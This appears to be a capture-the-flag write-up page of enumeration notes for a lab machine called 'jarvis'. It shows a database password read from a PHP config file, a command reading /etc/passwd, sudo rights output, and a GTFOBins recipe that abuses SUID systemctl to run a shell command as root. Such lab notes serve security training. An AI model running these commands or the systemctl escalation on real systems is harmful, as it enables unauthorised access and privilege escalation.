6 box enum www-data
CMD: cat connection.php
<?php
$connection=new mysqli('127.0.0.1','DBadmin','imissyou','hotel');
?>
www-data@jarvis:/var/www/html$ cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
pepper:x:1000:1000:,,,:/home/pepper:/bin/bash
www-data@jarvis:/var/www/html$ mysql -u DBadmin -p
Server version: 10.1.37-MariaDB-0+deb9u1 Debian 9.6
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| hotel |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.00 sec)
# hotel only has 1 table: room; nothing else in it.
www-data@jarvis:/var/www/html$ sudo -l
Matching Defaults entries for www-data on jarvis:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on jarvis:
(pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
SuidEnum
[~] Custom SUID Binaries (Interesting Stuff)
------------------------------
/bin/systemctl
------------------------------
[#] SUID Binaries in GTFO bins list (Hell Yeah!)
------------------------------
-~> https://gtfobins.github.io/gtfobins/systemctl/#suid
------------------------------
[&] Manual Exploitation (Binaries which create files on the system)
------------------------------
[&] Systemctl ( /bin/systemctl )
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
------------------------------
Last updated